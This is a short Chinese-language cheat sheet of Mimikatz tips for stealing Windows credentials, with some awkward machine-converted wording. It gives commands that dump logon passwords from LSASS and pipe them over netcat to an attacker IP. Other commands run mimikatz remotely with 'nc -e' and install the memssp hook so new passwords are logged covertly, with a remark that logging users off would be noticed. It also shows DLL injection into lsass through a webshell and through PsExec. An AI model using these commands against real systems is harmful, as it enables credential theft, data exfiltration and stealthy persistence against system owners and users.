Mimikatz 使用Tips

1.記錄 Mimikatz輸出： 
C:\>mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir
2.將輸出導入到本地文件： 
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt
3.將輸出傳輸到遠程機器： 
Attacker執行: 
E:\>nc -lvp 4444
Victim執行: 
C:\>mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit | nc.exe -vv 192.168.52.1 4444
192.168.52.1 爲Attacker IP 

4.經過nc遠程執行Mimikatz： 
Victim執行: 
C:\>nc -lvp 443
Attacker執行: 
E:\>nc.exe -vv 192.168.52.128 443 -e mimikatz.exe
192.168.52.128 爲Victim IP

若管理員有每過幾天就改密碼的習慣，可是mimikatz抓取到的密碼都是老密碼

用QuarksPwDump等抓的hash也是老hash，新密碼卻抓不到的狀況下

能夠使用如下方法嘗試解決

privilege::debug
misc::memssp

記錄的結果在c:\windows\system32\mimilsa.log
每次驗證都會記錄  如 鎖屏 等  重啓失效

出現如上問題是由於管理一直沒註銷過，都是直接斷開鏈接，lsass進程裏面還吃存放的老的。

也能夠直接logoff，可是這樣會很明顯。

 

文件

mimikatz.exe、sekurlsa.dll、PsExec.exe(3389)

 

本機終端

絕對路徑\mimikatz.exe

privilege::debug

inject::process lsass.exe "絕對路徑\sekurlsa.dll"

@getLogonPasswords

exit

 

 

webshell

絕對路徑\mimikatz.exe < 絕對路徑\c.txt > 絕對路徑\userpass.txt

----------c.txt----------

privilege::debug

inject::process lsass.exe "絕對路徑\sekurlsa.dll"

@getLogonPasswords

exit

-------------------------

 

 

遠程終端

psexec.exe -s cmd.exe

絕對路徑\mimikatz.exe

privilege::debug

inject::process lsass.exe "絕對路徑\sekurlsa.dll"

@getLogonPasswords

exit